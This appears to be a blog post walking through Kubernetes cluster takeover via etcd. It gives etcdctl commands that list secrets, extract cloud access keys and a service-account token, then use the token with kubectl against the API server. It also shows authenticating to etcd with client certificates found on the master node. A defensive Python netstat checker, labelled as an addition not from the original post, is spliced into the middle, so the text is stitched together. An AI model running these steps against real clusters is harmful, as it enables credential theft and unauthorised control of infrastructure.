cdxy.me

ETCD

etcd: the key-value database that stores Kubernetes cluster state. When it is misconfigured, or when it can be reached through an SSRF, access to etcd is equivalent to taking over the cluster. It runs on the K8s master node and exposes port 2379 internally: from 127.0.0.1 (127.1) it can be accessed without authentication, while from any other address you must pass the --endpoints parameter and a client cert to authenticate.

Documentation

  • https://kubernetes.io/zh/docs/concepts/overview/components/
  • https://etcd.io/docs/

The unauthenticated-access case

etcd v2 and v3 are two incompatible APIs; K8s uses v3. Select API v3 through an environment variable:

export ETCDCTL_API=3

Check that the connection works

etcdctl endpoint health

127.0.0.1:2379 is healthy: successfully committed proposal: took = 939.097µs

List the K8s secrets

etcdctl get / --prefix --keys-only | grep /secrets/

Retrieve the cloud-provider access keys (AK) stored in the cluster, for lateral movement:

etcdctl get /registry/secrets/default/acr-credential-518dfd1883737c2a6bde99ed6fee583c

Read a service account token

etcdctl get / --prefix --keys-only | grep /secrets/kube-system/clusterrole

From the end of the returned value, take the part that starts with ey and ends just before the trailing #kubernetes.io/service-account-token# marker:

Authenticate to the API server with that token and take over the cluster:

kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="[ey...]" -n kube-system get pods

The case where authentication is required

Try to read the etcd data

etcdctl get / --prefix --keys-only
Error: dial tcp 127.0.0.1:2379: getsockopt: connection refused

The result is a failed connection to local port 2379. A look at netstat shows that etcd is listening on the 172 range, so in this case you have to specify the endpoint and present a cert. A failed authentication returns Error: context deadline exceeded.

[root@iZbp13l0dv5x8ke1jmrpihZ cert]# netstat -antp | grep LISTEN
tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      2917/kubelet
tcp        0      0 127.0.0.1:10249         0.0.0.0:*               LISTEN      4801/kube-proxy
tcp        0      0 172.16.0.112:2379       0.0.0.0:*               LISTEN      3222/etcd
tcp        0      0 172.16.0.112:2380       0.0.0.0:*               LISTEN      3222/etcd
tcp        0      0 127.0.0.1:10253         0.0.0.0:*               LISTEN      4628/cloud-controll
tcp        0      0 127.0.0.1:10257         0.0.0.0:*               LISTEN      4134/kube-controlle
tcp        0      0 127.0.0.1:10259         0.0.0.0:*               LISTEN      4150/kube-scheduler
tcp        0      0 127.0.0.1:33941         0.0.0.0:*               LISTEN      2917/kubelet
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      3465/sshd
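The netstat step above can be turned into a repeatable check. The following Python script is an added example, not code from the original post: it parses `netstat -antp` output and flags etcd listeners (2379 client API, 2380 peer) bound to anything other than loopback, which is exactly where TLS client-certificate authentication has to be confirmed. The listing embedded in the script is constructed for the example and mixes a loopback bind with network binds so both outcomes are shown.

```python
import re
from ipaddress import ip_address

# Constructed sample modelled on a `netstat -antp | grep LISTEN` listing; not real host data.
SAMPLE_NETSTAT = """\
tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      2917/kubelet
tcp        0      0 127.0.0.1:2379          0.0.0.0:*               LISTEN      3222/etcd
tcp        0      0 172.16.0.112:2379       0.0.0.0:*               LISTEN      3222/etcd
tcp        0      0 172.16.0.112:2380       0.0.0.0:*               LISTEN      3222/etcd
tcp6       0      0 :::2379                 :::*                    LISTEN      3222/etcd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      3465/sshd
"""

ETCD_PORTS = {2379: "client API", 2380: "peer"}
# proto recv-q send-q local-address foreign-address state pid/program
LINE_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+)\s+\S+\s+LISTEN\s+(\S+)")

def parse_listeners(netstat_text):
    """Yield (host, port, program) for every LISTEN line of `netstat -antp` output."""
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        local, prog = m.groups()
        host, _, port = local.rpartition(":")   # rpartition keeps IPv6 ':::2379' intact
        yield host, int(port), prog

def is_loopback_only(host):
    """True only for a loopback bind; 0.0.0.0 and :: mean 'all interfaces'."""
    return ip_address(host).is_loopback

def etcd_exposure(netstat_text):
    """Report each etcd listener (by well-known port or by program name) and whether
    it is reachable from other hosts, i.e. whether client-cert auth must be verified."""
    findings = []
    for host, port, prog in parse_listeners(netstat_text):
        if port not in ETCD_PORTS and not prog.endswith("/etcd"):
            continue
        findings.append({"addr": f"{host}:{port}", "role": ETCD_PORTS.get(port, "other"),
                         "program": prog, "exposed": not is_loopback_only(host)})
    return findings

if __name__ == "__main__":
    for f in etcd_exposure(SAMPLE_NETSTAT):
        state = "NETWORK-REACHABLE, verify client-cert auth" if f["exposed"] else "loopback only"
        print(f'{f["addr"]:24} {f["role"]:10} {state}')
```

Feed it the real listing with `netstat -antp | python3 check_etcd.py`-style piping by replacing `SAMPLE_NETSTAT` with `sys.stdin.read()`.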

Accessing etcd with a cert

[root@iZbp13l0dv5x8ke1jmrpihZ cert]# ls
172.16.0.112-name-1.csr      172.16.0.114-name-3.csr      ca.pem               etcd-server.pem
172.16.0.112-name-1-key.pem  172.16.0.114-name-3-key.pem  etcd-client.csr      peer-ca-config.json
172.16.0.112-name-1.pem      172.16.0.114-name-3.pem      etcd-client-key.pem  peer-ca.csr
172.16.0.113-name-2.csr      ca-config.json               etcd-client.pem      peer-ca-key.pem
172.16.0.113-name-2-key.pem  ca.csr                       etcd-server.csr      peer-ca.pem
172.16.0.113-name-2.pem      ca-key.pem                   etcd-server-key.pem
[root@iZbp13l0dv5x8ke1jmrpihZ cert]# etcdctl --insecure-skip-tls-verify --insecure-transport=true --endpoints=https://172.16.0.112:2379 --cacert=ca.pem --key=etcd-client-key.pem --cert=etcd-client.pem endpoint health
https://172.16.0.112:2379 is healthy: successfully committed proposal: took = 2.084526ms